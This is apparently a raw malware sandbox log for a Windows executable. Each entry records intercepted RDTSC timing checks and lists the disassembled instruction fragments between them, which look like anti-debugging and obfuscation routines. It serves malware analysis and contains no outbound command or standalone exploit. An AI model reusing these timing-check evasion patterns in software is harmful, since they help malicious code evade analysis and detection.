Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D23680 second address: D2368F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D28A2B second address: D28A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D255E6 second address: D255EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2FED4 second address: D2FEDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2F675 second address: D2F6A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE56h 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jp 00007F7620C9DE46h 0x00000018 push esi 0x00000019 pop esi 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2F6A5 second address: D2F6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2F6A9 second address: D2F6BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7620C9DE46h 0x00000008 jmp 00007F7620C9DE4Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2F6BE second address: D2F6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2F997 second address: D2F9AA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7620C9DE46h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2FAD8 second address: D2FADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2FADC second address: D2FAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2FAE2 second address: D2FB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F7620BAC87Ah 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 popad 0x00000011 jnp 00007F7620BAC884h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D353B2 second address: D353F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jne 00007F7620C9DE4Eh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 ja 00007F7620C9DE58h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jng 00007F7620C9DE46h 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D376E5 second address: D37717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC886h 0x00000007 pushad 0x00000008 jmp 00007F7620BAC887h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D37717 second address: D3771D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3D8E2 second address: D3D8E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3D8E8 second address: D3D8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7620C9DE4Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3D8FB second address: D3D905 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7620BAC876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3D905 second address: D3D90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3D90E second address: D3D914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3DA40 second address: D3DA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3DA46 second address: D3DA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7620BAC87Fh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3DA5E second address: D3DA71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3E047 second address: D3E051 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7620BAC876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3E051 second address: D3E06B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3E06B second address: D3E06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3E305 second address: D3E30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D44454 second address: D4445A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4445A second address: D4445E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AD04 second address: D4AD0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AD0A second address: D4AD25 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7620C9DE4Dh 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AD25 second address: D4AD48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC883h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F7620BAC87Ah 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D499B8 second address: D499D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F7620C9DE46h 0x0000000c jnp 00007F7620C9DE46h 0x00000012 jg 00007F7620C9DE46h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49AFD second address: D49B07 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49B07 second address: D49B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE53h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49B20 second address: D49B2A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7620BAC876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49F7E second address: D49F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49F84 second address: D49F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49F88 second address: D49F9D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7620C9DE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F7620C9DE46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49F9D second address: D49FB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F7620BAC87Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4A238 second address: D4A246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7620C9DE46h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4A3BC second address: D4A3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC888h 0x00000009 pop edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4A3DC second address: D4A3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4A3E5 second address: D4A3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4A588 second address: D4A5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE54h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AB86 second address: D4AB92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007F7620BAC876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AB92 second address: D4AB98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AB98 second address: D4AB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AB9C second address: D4ABA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D493F6 second address: D49419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 js 00007F7620BAC876h 0x0000000e jmp 00007F7620BAC882h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49419 second address: D4943C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620C9DE56h 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F7620C9DE46h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4E5FB second address: D4E604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D12AF9 second address: D12B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE4Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D12B0A second address: CEC4CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 adc ch, 0000007Eh 0x0000000c call dword ptr [ebp+122D18D9h] 0x00000012 push esi 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop esi 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D130A2 second address: D130A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D138AF second address: D138B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D138B6 second address: D13908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, 5C41BC7Fh 0x00000011 push 0000001Eh 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7620C9DE48h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 jmp 00007F7620C9DE52h 0x00000036 pop esi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13A6E second address: D13A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13A78 second address: D13A87 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13A87 second address: D13A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13A8B second address: D13A91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13BCB second address: D13BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7620BAC883h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13BE8 second address: D13C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620C9DE55h 0x00000008 jmp 00007F7620C9DE4Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jbe 00007F7620C9DE46h 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13CC0 second address: D13CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13CC6 second address: D13CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 jp 00007F7620C9DE4Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13CDD second address: D13CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13CE3 second address: D13D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F7620C9DE48h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 xor ecx, dword ptr [ebp+122D2B4Dh] 0x00000027 lea eax, dword ptr [ebp+12485899h] 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F7620C9DE48h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov ecx, dword ptr [ebp+122D2B41h] 0x0000004d jo 00007F7620C9DE5Fh 0x00000053 call 00007F7620C9DE58h 0x00000058 pop edi 0x00000059 nop 0x0000005a push eax 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D13D63 second address: D13DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b jmp 00007F7620BAC87Ah 0x00000010 jnc 00007F7620BAC876h 0x00000016 popad 0x00000017 pop ecx 0x00000018 nop 0x00000019 push ecx 0x0000001a mov ecx, dword ptr [ebp+122D3BFDh] 0x00000020 pop edx 0x00000021 lea eax, dword ptr [ebp+12485855h] 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F7620BAC878h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 call 00007F7620BAC885h 0x00000046 mov dl, D5h 0x00000048 pop edx 0x00000049 nop 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F7620BAC888h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4E8DA second address: D4E8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4EE48 second address: D4EE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7620BAC876h 0x0000000a ja 00007F7620BAC876h 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4EE64 second address: D4EE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4EE6A second address: D4EE74 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7620BAC876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D54205 second address: D5420B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D5420B second address: D5420F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D5420F second address: D54218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D54218 second address: D54236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7620BAC87Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D54236 second address: D54249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7620C9DE4Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D544E5 second address: D544E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D544E9 second address: D54506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F7620C9DE51h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D546DD second address: D546E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D546E3 second address: D546ED instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7620C9DE46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D54B49 second address: D54B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC885h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D54B67 second address: D54B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D57EC2 second address: D57EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D57BB3 second address: D57BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
